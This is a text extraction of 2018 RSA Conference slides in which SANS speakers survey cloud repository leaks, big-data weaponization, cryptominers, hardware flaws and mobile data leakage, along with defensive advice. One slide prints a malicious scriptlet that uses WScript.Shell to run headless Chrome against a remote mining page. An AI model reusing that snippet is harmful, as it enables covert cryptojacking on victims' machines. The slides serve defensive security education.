the five most dangerous new attack techniques, and what’s to … · 2019-07-26 · the five most...

Moderator: Alan Paller

Speakers:

Ed SkoudisJohannes UllrichHeather Mahalik

The Five Most Dangerous New Attack Techniques, and What’s to ComeDecember 5, 2018

© 2018 RSA Conference. All rights reserved.

About This Session

• An update on topics introduced during the keynote panel discussion at RSA Conference

• Please ask questions for our panelists for the Q&A section after the initial brief presentations

2

Cloud Data Repository Breaches and Weaponization of Big DataEd SkoudisSANS Faculty Fellow and Pen Test Curriculum LeadDirector, SANS NetWars, CyberCity, and STX Projects


Repositories and Cloud Storage Data Leakage

• Software is built in a different way today• Cloud-based collaboration, code repositories,

and data storage• GitHub, Amazon AWS/S3, Google Cloud

Platform, Microsoft Azure, Docker Hub, etc.• Private repositories accidentally marked public• Public repositories with sensitive data in them

(keys and passwords)• Code and data put in the wrong repository


What You Can Do

• Data asset inventory• Data curator• Educate architects and developers

• Prevent developers from committing code with leaked creds:

• git-seekret• git-secrets

• Search for sensitive information in repositories• gitrob

• Review access logs associated with your assets


• Uses machine learning to discover and classify sensitive data in Amazon S3 buckets

• PII, intellectual property, etc.

• It then uses Amazon CloudWatch to monitor access looking for anomalies

• Price is $5 per GB protected, plus per $4 per 100,000 events


Microsoft Azure SQL Database Threat Detection• Uses machine learning to look at

cloud-based SQL Server event logs for anomalous activity:

• Suspicious access• Anomalous queries• Potential vulnerabilities• SQL injection attacks

• Price is $15 per database per month


Google’s Data Loss Prevention API• Looks for over 70 predefined detectors for PII and other sensitive information • Also looks for context clues• Supports automated

classification of data• Integrate into your own

applications built on Google’s infrastructure

• Complex pricing structurebased on inspection units(IUs) and transformation units (TUs)…

• 10 Giga Units are free• …then it’s $0.30 per GU after that


Weaponization of Big Data

• It’s not just about getting shell or exfiltratingspecific PII for criminal use any more

• Increasingly, it’s about hacking the data itself• Disparate sources and correlation• De-anonymization and much more• Are we fighting the last war?• No, but a big new front is hugely relevant


Tim Cook Comments

"Our own information, from the everyday to the deeply personal, is being weaponized against us with military efficiency."

"We shouldn't sugarcoat the consequences. This is surveillance. And these stockpiles of personal data serve only to enrich the companies that collect them."

International Conference of Data Protection and Privacy Commissioners in Brussels in October 2018


Weaponization of Big Data Analytics• March 2018: Announcement of

Cambridge Analytica’s scraping and analysis of Facebook data for the 2016 election

• Oct 2018: Russian firms who build facial recognition software for the Russian government scraped Facebook image data

• 2015: OPM breach of 22 Million government employee and contractors’ data, plus 5.6 Million fingerprints


What You Can Do

• Be careful about exposing data, even if it seems innocuous• Analyze business risks in terms of privacy implications• Consider how your data could be used with others’ data to

undermine your mission• Learn about Open Source Intelligence (OSINT) and data

analytics• Holiday Hack Challenge 2017 Naughty and Nice List• Holiday Hack Challenge 2018 coming in the next week or two

Cryptominer UpdateHardware VulnerabilitiesJohannes B. Ullrich, Ph.D.Dean of Research SANS Technology Inst.Directory of Internet Storm Center


Cryptocoin Mining – Prices are Dropping

14

0

200

400

600

Nov 2017 Jan 2018 Apr 2018 Jul 2018

Avg. PC: $10/year(end of 2018)


Miners are Improving

• Using less than 100% of CPU• Private mining pools• Root kits to evade detection• Observing user behavior

(turn off when system in use)• Better tailoring to system capabilities

15


Example: Coinmining in Headless Browser

16

<registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA00DABFC}" ><script language="JScript"><![CDATA[var foo = new ActiveXObject("WScript.Shell").Run("chrome.exe --headless --disable-gpu --remote-debugging-port=9222http://slprmnr.tk/obfus.html");]]> </script> </registration>


Return to IoT Mining

• 2014: Litecoin Mining common payload for IoT exploits (e.g. DVRs)

• 2016: Mirai Botnet: Focus shifts to DDoS• 2018: Coin miners are back (mostly Monero)

17


Hardware Issues Keep Coming

• March 2018 Branchscope• May 2018 various Spectre variants• August 2018 L1TF Flaws• Nov 2018 ECC Rowhammer demonstrated (first Feb 2017)

Never mind various BMC (Base Management Controller) issues and SPI flash vulnerabilities

18


Performance Issues / Patches

• Still vastly different numbers• Some of the patches can add up to substantial losses• Much depends on workload and operating system

optimizations• Patches delivered via operating system updates, but no

available for older systems

19

Data Leakages from Mobile

Heather MahalikSANS Senior InstructorDigital Forensics Expert


Privacy: Data Leakages from Smartphones

• Variety of operating systems• Lacking updates and security

features• Apps, apps, and more apps• Location tracking• Cloud…

Mobile devices are one of the

easiest platforms for attacks

21


Why the Mobile Device?

• Believe it or not, your phone knows more than you think!• How attacks happen:

• Application installs/permissions• Malware/Spyware• Stealing credentials• Cloud

22


Location Tracking

Maps

Navigation

Hiding in application

data

EXIF data

Health data

Exercise apps

Google

23


Just How Much Can Be Leaked?

24


The Social Media Nightmare

25


Ways to Mitigate

• Know what you install• Read before saying “yes” • Consider the pros and cons of 2FA• Use a third-party authenticator

• Google Authenticator• GlobalSign• Last Pass• Microsoft Authentication

26


Reality of Data Leakages from Mobile

• Great for Law Enforcement• Awful for us!• Can 2FA help or does it hurt us?• If you think this is bad, wait until you see the cloud

vulnerabilities and data leakages

27

Open Q&A

the five most dangerous new attack techniques, and what’s to … · 2019-07-26 · the five most...

Documents